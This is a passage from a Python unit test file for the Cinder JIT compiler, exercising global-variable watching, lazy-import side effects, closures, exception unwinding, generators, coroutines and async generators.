self.assertEqual(self.get_global(), "a value")
class MyGlobals(dict):
def __getitem__(self, key):
if key == "knock_knock":
return "who's there?"
return super().__getitem__(key)
@with_globals(MyGlobals())
def return_knock_knock(self):
return knock_knock
def test_dict_subclass_globals(self):
self.assertEqual(self.return_knock_knock(), "who's there?")
@unittest.failUnlessJITCompiled
def _test_unwatch_builtins(self):
self.set_global("hey")
self.assertEqual(self.get_global(), "hey")
builtins.__dict__[42] = 42
def test_unwatch_builtins(self):
try:
self._test_unwatch_builtins()
finally:
del builtins.__dict__[42]
@contextmanager
def temp_sys_path(self):
with tempfile.TemporaryDirectory() as tmpdir:
_orig_sys_modules = sys.modules
sys.modules = _orig_sys_modules.copy()
_orig_sys_path = sys.path[:]
sys.path.insert(0, tmpdir)
try:
yield Path(tmpdir)
finally:
sys.path[:] = _orig_sys_path
sys.modules = _orig_sys_modules
def test_preload_side_effect_modifies_globals(self):
with self.temp_sys_path() as tmp:
(tmp / "tmp_a.py").write_text(
dedent(
"""
from __future__ import lazy_imports
from tmp_b import B
A = 1
def get_a():
return A + B
"""
),
encoding="utf8",
)
(tmp / "tmp_b.py").write_text(
dedent(
"""
import tmp_a
tmp_a.A = 2
B = 3
"""
),
encoding="utf8",
)
if cinderjit:
cinderjit.clear_runtime_stats()
import tmp_a
# What happens on the first call is kinda undefined in principle
# given lazy imports; somebody could previously have imported B
# (not in this specific test, but in principle), or not, so the
# first call might return 4 or 5. With JIT compilation it will
# always return 5 because compilation will trigger the lazy import
# and its side effect. Without the JIT it will return 4 in this
# test, but we consider this an acceptable side effect of JIT
# compilation because this code can't in general rely on B never
# having previously been imported.
tmp_a.get_a()
# On the second call the result should undoubtedly be 5 in all
# circumstances. Even if we compile with the wrong value for A, the
# guard on the LoadGlobalCached will ensure we deopt and return the
# right result.
self.assertEqual(tmp_a.get_a(), 5)
if cinderjit:
self.assertTrue(cinderjit.is_jit_compiled(tmp_a.get_a))
# The real test here is what when the value of a global changes
# during compilation preload (as it does in this test because
# the preload bytescan of get_a() first hits A, loads the old
# value, then hits B, triggers the lazy import and imports
# tmp_b, causing the value of A to change), we still have time
# to compile with the correct (new) value and avoid compiling
# code that will inevitably deopt, and so we should.
stats = cinderjit.get_and_clear_runtime_stats()
relevant_deopts = [
d for d in stats["deopt"] if d["normal"]["func_qualname"] == "get_a"
]
self.assertEqual(relevant_deopts, [])
def test_preload_side_effect_makes_globals_unwatchable(self):
with self.temp_sys_path() as tmp:
(tmp / "tmp_a.py").write_text(
dedent(
"""
from __future__ import lazy_imports
from tmp_b import B
A = 1
def get_a():
return A + B
"""
),
encoding="utf8",
)
(tmp / "tmp_b.py").write_text(
dedent(
"""
import tmp_a
tmp_a.__dict__[42] = 1
tmp_a.A = 2
B = 3
"""
),
encoding="utf8",
)
if cinderjit:
cinderjit.clear_runtime_stats()
import tmp_a
tmp_a.get_a()
self.assertEqual(tmp_a.get_a(), 5)
if cinderjit:
self.assertTrue(cinderjit.is_jit_compiled(tmp_a.get_a))
def test_preload_side_effect_makes_builtins_unwatchable(self):
with self.temp_sys_path() as tmp:
(tmp / "tmp_a.py").write_text(
dedent(
"""
from __future__ import lazy_imports
from tmp_b import B
def get_a():
return max(1, 2) + B
"""
),
encoding="utf8",
)
(tmp / "tmp_b.py").write_text(
dedent(
"""
__builtins__[42] = 2
B = 3
"""
),
encoding="utf8",
)
if cinderjit:
cinderjit.clear_runtime_stats()
import tmp_a
tmp_a.get_a()
self.assertEqual(tmp_a.get_a(), 5)
if cinderjit:
self.assertTrue(cinderjit.is_jit_compiled(tmp_a.get_a))
class ClosureTests(unittest.TestCase):
@unittest.failUnlessJITCompiled
def test_cellvar(self):
a = 1
def foo():
return a
self.assertEqual(foo(), 1)
@unittest.failUnlessJITCompiled
def test_two_cellvars(self):
a = 1
b = 2
def g():
return a + b
self.assertEqual(g(), 3)
@unittest.failUnlessJITCompiled
def test_cellvar_argument(self):
def foo():
self.assertEqual(1, 1)
foo()
@unittest.failUnlessJITCompiled
def test_cellvar_argument_modified(self):
self_ = self
def foo():
nonlocal self
self = 1
self_.assertIs(self, self_)
foo()
self_.assertEqual(self, 1)
@unittest.failUnlessJITCompiled
def _cellvar_unbound(self):
b = a
a = 1
def g():
return a
def test_cellvar_unbound(self):
with self.assertRaises(UnboundLocalError) as ctx:
self._cellvar_unbound()
self.assertEqual(
str(ctx.exception), "local variable 'a' referenced before assignment"
)
def test_freevars(self):
x = 1
@unittest.failUnlessJITCompiled
def nested():
return x
x = 2
self.assertEqual(nested(), 2)
def test_freevars_multiple_closures(self):
def get_func(a):
@unittest.failUnlessJITCompiled
def f():
return a
return f
f1 = get_func(1)
f2 = get_func(2)
self.assertEqual(f1(), 1)
self.assertEqual(f2(), 2)
def test_nested_func(self):
@unittest.failUnlessJITCompiled
def add(a, b):
return a + b
self.assertEqual(add(1, 2), 3)
self.assertEqual(add("eh", "bee"), "ehbee")
@staticmethod
def make_adder(a):
@unittest.failUnlessJITCompiled
def add(b):
return a + b
return add
def test_nested_func_with_closure(self):
add_3 = self.make_adder(3)
add_7 = self.make_adder(7)
self.assertEqual(add_3(10), 13)
self.assertEqual(add_7(12), 19)
self.assertEqual(add_3(add_7(-100)), -90)
with self.assertRaises(TypeError):
add_3("ok")
def test_nested_func_with_different_globals(self):
@unittest.failUnlessJITCompiled
@with_globals({"A_GLOBAL_CONSTANT": 0xDEADBEEF})
def return_global():
return A_GLOBAL_CONSTANT
self.assertEqual(return_global(), 0xDEADBEEF)
return_other_global = with_globals({"A_GLOBAL_CONSTANT": 0xFACEB00C})(
return_global
)
self.assertEqual(return_other_global(), 0xFACEB00C)
self.assertEqual(return_global(), 0xDEADBEEF)
self.assertEqual(return_other_global(), 0xFACEB00C)
def test_nested_func_outlives_parent(self):
@unittest.failUnlessJITCompiled
def nested(x):
@unittest.failUnlessJITCompiled
def inner(y):
return x + y
return inner
nested_ref = weakref.ref(nested)
add_5 = nested(5)
nested = None
self.assertIsNone(nested_ref())
self.assertEqual(add_5(10), 15)
class TempNameTests(unittest.TestCase):
@unittest.failUnlessJITCompiled
def _tmp_name(self, a, b):
tmp1 = "hello"
c = a + b
return tmp1
def test_tmp_name(self):
self.assertEqual(self._tmp_name(1, 2), "hello")
@unittest.failUnlessJITCompiled
def test_tmp_name2(self):
v0 = 5
self.assertEqual(v0, 5)
class DummyContainer:
def __len__(self):
raise Exception("hello!")
class ExceptionInConditional(unittest.TestCase):
@unittest.failUnlessJITCompiled
def doit(self, x):
if x:
return 1
return 2
def test_exception_thrown_in_conditional(self):
with self.assertRaisesRegex(Exception, "hello!"):
self.doit(DummyContainer())
class JITCompileCrasherRegressionTests(unittest.TestCase):
@unittest.failUnlessJITCompiled
def _fstring(self, flag, it1, it2):
for a in it1:
for b in it2:
if flag:
return f"{a}"
def test_fstring_no_fmt_spec_in_nested_loops_and_if(self):
self.assertEqual(self._fstring(True, [1], [1]), "1")
@unittest.failUnlessJITCompiled
async def _sharedAwait(self, x, y, z):
return await (x() if y else z())
def test_shared_await(self):
async def zero():
return 0
async def one():
return 1
with self.assertRaises(StopIteration) as exc:
self._sharedAwait(zero, True, one).send(None)
self.assertEqual(exc.exception.value, 0)
with self.assertRaises(StopIteration) as exc:
self._sharedAwait(zero, False, one).send(None)
self.assertEqual(exc.exception.value, 1)
class DelObserver:
def __init__(self, id, cb):
self.id = id
self.cb = cb
def __del__(self):
self.cb(self.id)
class UnwindStateTests(unittest.TestCase):
DELETED = []
def setUp(self):
self.DELETED.clear()
self.addCleanup(lambda: self.DELETED.clear())
def get_del_observer(self, id):
return DelObserver(id, lambda i: self.DELETED.append(i))
@unittest.failUnlessJITCompiled
def _copied_locals(self, a):
b = c = a
raise RuntimeError()
def test_copied_locals_in_frame(self):
try:
self._copied_locals("hello")
except RuntimeError as re:
f_locals = re.__traceback__.tb_next.tb_frame.f_locals
self.assertEqual(
f_locals, {"self": self, "a": "hello", "b": "hello", "c": "hello"}
)
@unittest.failUnlessJITCompiled
def _raise_with_del_observer_on_stack(self):
for x in (1 for i in [self.get_del_observer(1)]):
raise RuntimeError()
def test_decref_stack_objects(self):
"""Items on stack should be decrefed on unwind."""
try:
self._raise_with_del_observer_on_stack()
except RuntimeError:
deleted = list(self.DELETED)
else:
self.fail("should have raised RuntimeError")
self.assertEqual(deleted, [1])
@unittest.failUnlessJITCompiled
def _raise_with_del_observer_on_stack_and_cell_arg(self):
for x in (self for i in [self.get_del_observer(1)]):
raise RuntimeError()
def test_decref_stack_objs_with_cell_args(self):
# Regression test for a JIT bug in which the unused locals slot for a
# local-which-is-a-cell would end up getting populated on unwind with
# some unrelated stack object, preventing it from being decrefed.
try:
self._raise_with_del_observer_on_stack_and_cell_arg()
except RuntimeError:
deleted = list(self.DELETED)
else:
self.fail("should have raised RuntimeError")
self.assertEqual(deleted, [1])
class ImportTests(unittest.TestCase):
@unittest.failUnlessJITCompiled
def test_import_name(self):
import math
self.assertEqual(int(math.pow(1, 2)), 1)
@unittest.failUnlessJITCompiled
def _fail_to_import_name(self):
import non_existent_module
def test_import_name_failure(self):
with self.assertRaises(ModuleNotFoundError):
self._fail_to_import_name()
@unittest.failUnlessJITCompiled
def test_import_from(self):
from math import pow as math_pow
self.assertEqual(int(math_pow(1, 2)), 1)
@unittest.failUnlessJITCompiled
def _fail_to_import_from(self):
from math import non_existent_attr
def test_import_from_failure(self):
with self.assertRaises(ImportError):
self._fail_to_import_from()
class RaiseTests(unittest.TestCase):
@unittest.failUnlessJITCompiled
def _jitRaise(self, exc):
raise exc
@unittest.failUnlessJITCompiled
def _jitRaiseCause(self, exc, cause):
raise exc from cause
@unittest.failUnlessJITCompiled
def _jitReraise(self):
raise
def test_raise_type(self):
with self.assertRaises(ValueError):
self._jitRaise(ValueError)
def test_raise_value(self):
with self.assertRaises(ValueError) as exc:
self._jitRaise(ValueError(1))
self.assertEqual(exc.exception.args, (1,))
def test_raise_with_cause(self):
cause = ValueError(2)
cause_tb_str = f"{cause.__traceback__}"
with self.assertRaises(ValueError) as exc:
self._jitRaiseCause(ValueError(1), cause)
self.assertIs(exc.exception.__cause__, cause)
self.assertEqual(f"{exc.exception.__cause__.__traceback__}", cause_tb_str)
def test_reraise(self):
original_raise = ValueError(1)
with self.assertRaises(ValueError) as exc:
try:
raise original_raise
except ValueError:
self._jitReraise()
self.assertIs(exc.exception, original_raise)
def test_reraise_of_nothing(self):
with self.assertRaises(RuntimeError) as exc:
self._jitReraise()
self.assertEqual(exc.exception.args, ("No active exception to reraise",))
class GeneratorsTest(unittest.TestCase):
@unittest.failUnlessJITCompiled
def _f1(self):
yield 1
def test_basic_operation(self):
g = self._f1()
self.assertEqual(g.send(None), 1)
with self.assertRaises(StopIteration) as exc:
g.send(None)
self.assertIsNone(exc.exception.value)
@unittest.failUnlessJITCompiled
def _f2(self):
yield 1
yield 2
return 3
def test_multi_yield_and_return(self):
g = self._f2()
self.assertEqual(g.send(None), 1)
self.assertEqual(g.send(None), 2)
with self.assertRaises(StopIteration) as exc:
g.send(None)
self.assertEqual(exc.exception.value, 3)
@unittest.failUnlessJITCompiled
def _f3(self):
a = yield 1
b = yield 2
return a + b
def test_receive_values(self):
g = self._f3()
self.assertEqual(g.send(None), 1)
self.assertEqual(g.send(100), 2)
with self.assertRaises(StopIteration) as exc:
g.send(1000)
self.assertEqual(exc.exception.value, 1100)
@unittest.failUnlessJITCompiled
def _f4(self, a):
yield a
yield a
return a
def test_one_arg(self):
g = self._f4(10)
self.assertEqual(g.send(None), 10)
self.assertEqual(g.send(None), 10)
with self.assertRaises(StopIteration) as exc:
g.send(None)
self.assertEqual(exc.exception.value, 10)
@unittest.failUnlessJITCompiled
def _f5(
self, a1, a2, a3, a4, a5, a6, a7, a8, a9, a10, a11, a12, a13, a14, a15, a16
):
v = (
yield a1
+ a2
+ a3
+ a4
+ a5
+ a6
+ a7
+ a8
+ a9
+ a10
+ a11
+ a12
+ a13
+ a14
+ a15
+ a16
)
a1 <<= v
a2 <<= v
a3 <<= v
a4 <<= v
a5 <<= v
a6 <<= v
a7 <<= v
a8 <<= v
a9 <<= v
a10 <<= v
a11 <<= v
a12 <<= v
a13 <<= v
a14 <<= v
a15 <<= v
a16 <<= v
v = (
yield a1
+ a2
+ a3
+ a4
+ a5
+ a6
+ a7
+ a8
+ a9
+ a10
+ a11
+ a12
+ a13
+ a14
+ a15
+ a16
)
a1 <<= v
a2 <<= v
a3 <<= v
a4 <<= v
a5 <<= v
a6 <<= v
a7 <<= v
a8 <<= v
a9 <<= v
a10 <<= v
a11 <<= v
a12 <<= v
a13 <<= v
a14 <<= v
a15 <<= v
a16 <<= v
return (
a1
+ a2
+ a3
+ a4
+ a5
+ a6
+ a7
+ a8
+ a9
+ a10
+ a11
+ a12
+ a13
+ a14
+ a15
+ a16
)
def test_save_all_registers_and_spill(self):
g = self._f5(
0x1,
0x2,
0x4,
0x8,
0x10,
0x20,
0x40,
0x80,
0x100,
0x200,
0x400,
0x800,
0x1000,
0x2000,
0x4000,
0x8000,
)
self.assertEqual(g.send(None), 0xFFFF)
self.assertEqual(g.send(1), 0xFFFF << 1)
with self.assertRaises(StopIteration) as exc:
g.send(2)
self.assertEqual(exc.exception.value, 0xFFFF << 3)
def test_for_loop_driven(self):
l = []
for x in self._f2():
l.append(x)
self.assertEqual(l, [1, 2])
@unittest.failUnlessJITCompiled
def _f6(self):
i = 0
while i < 1000:
i = yield i
def test_many_iterations(self):
g = self._f6()
self.assertEqual(g.send(None), 0)
for i in range(1, 1000):
self.assertEqual(g.send(i), i)
with self.assertRaises(StopIteration) as exc:
g.send(1000)
self.assertIsNone(exc.exception.value)
def _f_raises(self):
raise ValueError
@unittest.failUnlessJITCompiled
def _f7(self):
self._f_raises()
yield 1
def test_raise(self):
g = self._f7()
with self.assertRaises(ValueError):
g.send(None)
def test_throw_into_initial_yield(self):
g = self._f1()
with self.assertRaises(ValueError):
g.throw(ValueError)
def test_throw_into_yield(self):
g = self._f2()
self.assertEqual(g.send(None), 1)
with self.assertRaises(ValueError):
g.throw(ValueError)
def test_close_on_initial_yield(self):
g = self._f1()
g.close()
def test_close_on_yield(self):
g = self._f2()
self.assertEqual(g.send(None), 1)
g.close()
@unittest.failUnlessJITCompiled
def _f8(self, a):
x += yield a
def test_do_not_deopt_before_initial_yield(self):
g = self._f8(1)
with self.assertRaises(UnboundLocalError):
g.send(None)
@unittest.failUnlessJITCompiled
def _f9(self, a):
yield
return a
def test_incref_args(self):
class X:
pass
g = self._f9(X())
g.send(None)
with self.assertRaises(StopIteration) as exc:
g.send(None)
self.assertIsInstance(exc.exception.value, X)
@unittest.failUnlessJITCompiled
def _f10(self, X):
x = X()
yield weakref.ref(x)
return x
def test_gc_traversal(self):
class X:
pass
g = self._f10(X)
weak_ref_x = g.send(None)
self.assertIn(weak_ref_x(), gc.get_objects())
referrers = gc.get_referrers(weak_ref_x())
self.assertEqual(len(referrers), 1)
if unittest.case.CINDERJIT_ENABLED:
self.assertIs(referrers[0], g)
else:
self.assertIs(referrers[0], g.gi_frame)
with self.assertRaises(StopIteration):
g.send(None)
def test_resuming_in_another_thread(self):
g = self._f1()
def thread_function(g):
self.assertEqual(g.send(None), 1)
with self.assertRaises(StopIteration):
g.send(None)
t = threading.Thread(target=thread_function, args=(g,))
t.start()
t.join()
def test_release_data_on_discard(self):
o = object()
base_count = sys.getrefcount(o)
g = self._f9(o)
self.assertEqual(sys.getrefcount(o), base_count + 1)
del g
self.assertEqual(sys.getrefcount(o), base_count)
@unittest.failUnlessJITCompiled
def _f12(self, g):
a = yield from g
return a
def test_yield_from_generator(self):
g = self._f12(self._f2())
self.assertEqual(g.send(None), 1)
self.assertEqual(g.send(None), 2)
with self.assertRaises(StopIteration) as exc:
g.send(None)
self.assertEqual(exc.exception.value, 3)
def test_yield_from_iterator(self):
g = self._f12([1, 2])
self.assertEqual(g.send(None), 1)
self.assertEqual(g.send(None), 2)
with self.assertRaises(StopIteration):
g.send(None)
def test_yield_from_forwards_raise_down(self):
def f():
try:
yield 1
except ValueError:
return 2
return 3
g = self._f12(f())
self.assertEqual(g.send(None), 1)
with self.assertRaises(StopIteration) as exc:
g.throw(ValueError)
self.assertEqual(exc.exception.value, 2)
def test_yield_from_forwards_raise_up(self):
def f():
raise ValueError
yield 1
g = self._f12(f())
with self.assertRaises(ValueError):
g.send(None)
def test_yield_from_passes_raise_through(self):
g = self._f12(self._f2())
self.assertEqual(g.send(None), 1)
with self.assertRaises(ValueError):
g.throw(ValueError)
def test_yield_from_forwards_close_down(self):
saw_close = False
def f():
nonlocal saw_close
try:
yield 1
except GeneratorExit:
saw_close = True
return 2
g = self._f12(f())
self.assertEqual(g.send(None), 1)
g.close()
self.assertTrue(saw_close)
def test_yield_from_passes_close_through(self):
g = self._f12(self._f2())
self.assertEqual(g.send(None), 1)
g.close()
def test_assert_on_yield_from_coro(self):
async def coro():
pass
c = coro()
with self.assertRaises(TypeError) as exc:
self._f12(c).send(None)
self.assertEqual(
str(exc.exception),
"cannot 'yield from' a coroutine object in a non-coroutine generator",
)
# Suppress warning
c.close()
def test_gen_freelist(self):
"""Exercise making a JITted generator with gen_data memory off the freelist."""
# make and dealloc a small coro, which will put its memory area on the freelist
sc = self.small_coro()
with self.assertRaises(StopIteration):
sc.send(None)
del sc
# run another coro to verify we didn't put a bad pointer on the freelist
sc2 = self.small_coro()
with self.assertRaises(StopIteration):
sc2.send(None)
del sc2
# make a big coro and then deallocate it, bypassing the freelist
bc = self.big_coro()
with self.assertRaises(StopIteration):
bc.send(None)
del bc
@unittest.failUnlessJITCompiled
async def big_coro(self):
# This currently results in a max spill size of ~100, but that could
# change with JIT register allocation improvements. This test is only
# testing what it intends to as long as the max spill size of this
# function is greater than jit::kMinGenSpillWords. Ideally we'd assert
# that in the test, but neither value is introspectable from Python.
return dict(
a=dict(a=1, b=2, c=3, d=4, e=5, f=6, g=7, h=8, i=9),
b=dict(a=1, b=2, c=3, d=4, e=5, f=6, g=7, h=8, i=9),
c=dict(a=1, b=2, c=3, d=4, e=5, f=6, g=7, h=8, i=9),
d=dict(a=1, b=2, c=3, d=4, e=5, f=6, g=7, h=8, i=9),
e=dict(a=1, b=2, c=3, d=4, e=5, f=6, g=7, h=8, i=9),
f=dict(a=1, b=2, c=3, d=4, e=5, f=6, g=7, h=8, i=9),
g=dict(a=1, b=2, c=3, d=4, e=5, f=6, g=7, h=8, i=9),
h=dict(a=1, b=2, c=3, d=4, e=5, f=6, g=7, h=8, i=9),
)
@unittest.failUnlessJITCompiled
async def small_coro(self):
return 1
def test_generator_globals(self):
val1 = "a value"
val2 = "another value"
gbls = {"A_GLOBAL": val1}
@with_globals(gbls)
def gen():
yield A_GLOBAL
yield A_GLOBAL
g = gen()
self.assertIs(g.__next__(), val1)
gbls["A_GLOBAL"] = val2
del gbls
self.assertIs(g.__next__(), val2)
with self.assertRaises(StopIteration):
g.__next__()
class GeneratorFrameTest(unittest.TestCase):
@unittest.failUnlessJITCompiled
def gen1(self):
a = 1
yield a
a = 2
yield a
def test_access_before_send(self):
g = self.gen1()
f = g.gi_frame
self.assertEqual(next(g), 1)
self.assertEqual(g.gi_frame, f)
self.assertEqual(next(g), 2)
self.assertEqual(g.gi_frame, f)
def test_access_after_send(self):
g = self.gen1()
self.assertEqual(next(g), 1)
f = g.gi_frame
self.assertEqual(next(g), 2)
self.assertEqual(g.gi_frame, f)
@unittest.failUnlessJITCompiled
def gen2(self):
me = yield
f = me.gi_frame
yield f
yield 10
def test_access_while_running(self):
g = self.gen2()
next(g)
f = g.send(g)
self.assertEqual(f, g.gi_frame)
next(g)
class CoroutinesTest(unittest.TestCase):
@unittest.failUnlessJITCompiled
async def _f1(self):
return 1
@unittest.failUnlessJITCompiled
async def _f2(self, await_target):
return await await_target
def test_basic_coroutine(self):
c = self._f2(self._f1())
with self.assertRaises(StopIteration) as exc:
c.send(None)
self.assertEqual(exc.exception.value, 1)
def test_cannot_await_coro_already_awaiting_on_a_sub_iterator(self):
class DummyAwaitable:
def __await__(self):
return iter([1])
c = self._f2(DummyAwaitable())
self.assertEqual(c.send(None), 1)
with self.assertRaises(RuntimeError) as exc:
self._f2(c).send(None)
self.assertEqual(str(exc.exception), "coroutine is being awaited already")
def test_works_with_asyncio(self):
try:
asyncio.run(self._f2(asyncio.sleep(0.1)))
finally:
# This is needed to avoid an "environment changed" error
asyncio.set_event_loop_policy(None)
@unittest.failUnlessJITCompiled
@asyncio.coroutine
def _f3(self):
yield 1
return 2
def test_pre_async_coroutine(self):
c = self._f3()
self.assertEqual(c.send(None), 1)
with self.assertRaises(StopIteration) as exc:
c.send(None)
self.assertEqual(exc.exception.value, 2)
@staticmethod
@unittest.failUnlessJITCompiled
async def _use_async_with(mgr_type):
async with mgr_type():
pass
def test_bad_awaitable_in_with(self):
class BadAEnter:
def __aenter__(self):
pass
async def __aexit__(self, exc, ty, tb):
pass
class BadAExit:
async def __aenter__(self):
pass
def __aexit__(self, exc, ty, tb):
pass
with self.assertRaisesRegex(
TypeError,
"'async with' received an object from __aenter__ "
"that does not implement __await__: NoneType",
):
asyncio.run(self._use_async_with(BadAEnter))
with self.assertRaisesRegex(
TypeError,
"'async with' received an object from __aexit__ "
"that does not implement __await__: NoneType",
):
asyncio.run(self._use_async_with(BadAExit))
class FakeFuture:
def __init__(self, obj):
self._obj = obj
def __await__(self):
i = iter([self._obj])
self._obj = None
return i
@unittest.skipUnlessCinderJITEnabled("Exercises JIT-specific bug")
def test_jit_coro_awaits_interp_coro(self):
@cinderjit.jit_suppress
async def eager_suspend(suffix):
await self.FakeFuture("hello, " + suffix)
@unittest.failUnlessJITCompiled
async def jit_coro():
await eager_suspend("bob")
coro = jit_coro()
v1 = coro.send(None)
with self.assertRaises(StopIteration):
coro.send(None)
self.assertEqual(v1, "hello, bob")
def assert_already_awaited(self, coro):
with self.assertRaisesRegex(RuntimeError, "coroutine is being awaited already"):
asyncio.run(coro)
def test_already_awaited_coroutine_in_try_except(self):
"""Except blocks should execute when a coroutine is already awaited"""
async def f():
await asyncio.sleep(0.1)
executed_except_block = False
async def runner():
nonlocal executed_except_block
coro = f()
loop = asyncio.get_running_loop()
t = loop.create_task(coro)
try:
await asyncio.sleep(0)
await coro
except RuntimeError:
executed_except_block = True
t.cancel()
raise
self.assert_already_awaited(runner())
self.assertTrue(executed_except_block)
def test_already_awaited_coroutine_in_try_finally(self):
"""Finally blocks should execute when a coroutine is already awaited"""
async def f():
await asyncio.sleep(0.1)
executed_finally_block = False
async def runner():
nonlocal executed_finally_block
coro = f()
loop = asyncio.get_running_loop()
t = loop.create_task(coro)
try:
await asyncio.sleep(0)
await coro
finally:
executed_finally_block = True
t.cancel()
self.assert_already_awaited(runner())
self.assertTrue(executed_finally_block)
def test_already_awaited_coroutine_in_try_except_finally(self):
"""Except and finally blocks should execute when a coroutine is already
awaited.
"""
async def f():
await asyncio.sleep(0.1)
executed_except_block = False
executed_finally_block = False
async def runner():
nonlocal executed_except_block, executed_finally_block
coro = f()
loop = asyncio.get_running_loop()
t = loop.create_task(coro)
try:
await asyncio.sleep(0)
await coro
except RuntimeError:
executed_except_block = True
raise
finally:
executed_finally_block = True
t.cancel()
self.assert_already_awaited(runner())
self.assertTrue(executed_except_block)
self.assertTrue(executed_finally_block)
class EagerCoroutineDispatch(StaticTestBase):
def _assert_awaited_flag_seen(self, async_f_under_test):
awaited_capturer = _testcapi.TestAwaitedCall()
self.assertIsNone(awaited_capturer.last_awaited())
coro = async_f_under_test(awaited_capturer)
# TestAwaitedCall doesn't actually return a coroutine. This doesn't
# matter though because by the time a TypeError is raised we run far
# enough to know if the awaited flag was passed.
with self.assertRaisesRegex(
TypeError, r".*can't be used in 'await' expression"
):
coro.send(None)
coro.close()
self.assertTrue(awaited_capturer.last_awaited())
self.assertIsNone(awaited_capturer.last_awaited())
def _assert_awaited_flag_not_seen(self, async_f_under_test):
awaited_capturer = _testcapi.TestAwaitedCall()
self.assertIsNone(awaited_capturer.last_awaited())
coro = async_f_under_test(awaited_capturer)
with self.assertRaises(StopIteration):
coro.send(None)
coro.close()
self.assertFalse(awaited_capturer.last_awaited())
self.assertIsNone(awaited_capturer.last_awaited())
@unittest.failUnlessJITCompiled
async def _call_ex(self, t):
t(*[1])
@unittest.failUnlessJITCompiled
async def _call_ex_awaited(self, t):
await t(*[1])
@unittest.failUnlessJITCompiled
async def _call_ex_kw(self, t):
t(*[1], **{2: 3})
@unittest.failUnlessJITCompiled
async def _call_ex_kw_awaited(self, t):
await t(*[1], **{2: 3})
@unittest.failUnlessJITCompiled
async def _call_method(self, t):
# https://stackoverflow.com/questions/19476816/creating-an-empty-object-in-python
o = type("", (), {})()
o.t = t
o.t()
@unittest.failUnlessJITCompiled
async def _call_method_awaited(self, t):
o = type("", (), {})()
o.t = t
await o.t()
@unittest.failUnlessJITCompiled
async def _vector_call(self, t):
t()
@unittest.failUnlessJITCompiled
async def _vector_call_awaited(self, t):
await t()
@unittest.failUnlessJITCompiled
async def _vector_call_kw(self, t):
t(a=1)
@unittest.failUnlessJITCompiled
async def _vector_call_kw_awaited(self, t):
await t(a=1)
def test_call_ex(self):
self._assert_awaited_flag_not_seen(self._call_ex)
def test_call_ex_awaited(self):
self._assert_awaited_flag_seen(self._call_ex_awaited)
def test_call_ex_kw(self):
self._assert_awaited_flag_not_seen(self._call_ex_kw)
def test_call_ex_kw_awaited(self):
self._assert_awaited_flag_seen(self._call_ex_kw_awaited)
def test_call_method(self):
self._assert_awaited_flag_not_seen(self._call_method)
def test_call_method_awaited(self):
self._assert_awaited_flag_seen(self._call_method_awaited)
def test_vector_call(self):
self._assert_awaited_flag_not_seen(self._vector_call)
def test_vector_call_awaited(self):
self._assert_awaited_flag_seen(self._vector_call_awaited)
def test_vector_call_kw(self):
self._assert_awaited_flag_not_seen(self._vector_call_kw)
def test_vector_call_kw_awaited(self):
self._assert_awaited_flag_seen(self._vector_call_kw_awaited)
def test_invoke_function(self):
codestr = f"""
def x() -> None:
pass
async def await_x() -> None:
await x()
async def call_x() -> None:
c = x()
"""
c = self.compile(codestr, StaticCodeGenerator, modname="test_invoke_function")
await_x = self.find_code(c, "await_x")
self.assertInBytecode(
await_x, "INVOKE_FUNCTION", (("test_invoke_function", "x"), 0)
)
call_x = self.find_code(c, "call_x")
self.assertInBytecode(
call_x, "INVOKE_FUNCTION", (("test_invoke_function", "x"), 0)
)
with self.in_module(codestr) as mod:
mod.x = _testcapi.TestAwaitedCall()
self.assertIsInstance(mod.x, _testcapi.TestAwaitedCall)
self.assertIsNone(mod.x.last_awaited())
coro = mod.await_x()
with self.assertRaisesRegex(
TypeError, r".*can't be used in 'await' expression"
):
coro.send(None)
coro.close()
self.assertTrue(mod.x.last_awaited())
self.assertIsNone(mod.x.last_awaited())
coro = mod.call_x()
with self.assertRaises(StopIteration):
coro.send(None)
coro.close()
self.assertFalse(mod.x.last_awaited())
if cinderjit:
self.assertTrue(cinderjit.is_jit_compiled(mod.await_x))
self.assertTrue(cinderjit.is_jit_compiled(mod.call_x))
def test_invoke_method(self):
codestr = f"""
class X:
def x(self) -> None:
pass
async def await_x() -> None:
await X().x()
async def call_x() -> None:
X().x()
"""
c = self.compile(codestr, StaticCodeGenerator, modname="test_invoke_method")
await_x = self.find_code(c, "await_x")
self.assertInBytecode(
await_x, "INVOKE_METHOD", (("test_invoke_method", "X", "x"), 0)
)
call_x = self.find_code(c, "call_x")
self.assertInBytecode(
call_x, "INVOKE_METHOD", (("test_invoke_method", "X", "x"), 0)
)
with self.in_module(codestr) as mod:
awaited_capturer = mod.X.x = _testcapi.TestAwaitedCall()
self.assertIsNone(awaited_capturer.last_awaited())
coro = mod.await_x()
with self.assertRaisesRegex(
TypeError, r".*can't be used in 'await' expression"
):
coro.send(None)
coro.close()
self.assertTrue(awaited_capturer.last_awaited())
self.assertIsNone(awaited_capturer.last_awaited())
coro = mod.call_x()
with self.assertRaises(StopIteration):
coro.send(None)
coro.close()
self.assertFalse(awaited_capturer.last_awaited())
if cinderjit:
self.assertTrue(cinderjit.is_jit_compiled(mod.await_x))
self.assertTrue(cinderjit.is_jit_compiled(mod.call_x))
async def y():
await DummyAwaitable()
def test_async_yielding(self):
class DummyAwaitable:
def __await__(self):
return iter([1, 2])
coro = self._vector_call_awaited(DummyAwaitable)
self.assertEqual(coro.send(None), 1)
self.assertEqual(coro.send(None), 2)
class AsyncGeneratorsTest(unittest.TestCase):
@unittest.failUnlessJITCompiled
async def _f1(self, awaitable):
x = yield 1
yield x
await awaitable
def test_basic_coroutine(self):
class DummyAwaitable:
def __await__(self):
return iter([3])
async_gen = self._f1(DummyAwaitable())
# Step 1: move through "yield 1"
async_itt1 = async_gen.asend(None)
with self.assertRaises(StopIteration) as exc:
async_itt1.send(None)
self.assertEqual(exc.exception.value, 1)
# Step 2: send in and receive out 2 via "yield x"
async_itt2 = async_gen.asend(2)
with self.assertRaises(StopIteration) as exc:
async_itt2.send(None)
self.assertEqual(exc.exception.value, 2)
# Step 3: yield of "3" from DummyAwaitable
async_itt3 = async_gen.asend(None)
self.assertEqual(async_itt3.send(None), 3)
# Step 4: complete
with self.assertRaises(StopAsyncIteration):
async_itt3.send(None)
@unittest.failUnlessJITCompiled
async def _f2(self, asyncgen):
res = []
async for x in asyncgen:
res.append(x)
return res
def test_for_iteration(self):
async def asyncgen():
yield 1
yield 2
self.assertEqual(asyncio.run(self._f2(asyncgen())), [1, 2])
def _assertExceptionFlowsThroughYieldFrom(self, exc):
tb_prev = None
tb = exc.__traceback__
while tb.tb_next:
tb_prev = tb
tb = tb.tb_next
instrs = [x for x in dis.get_instructions(tb_prev.tb_frame.f_code)]
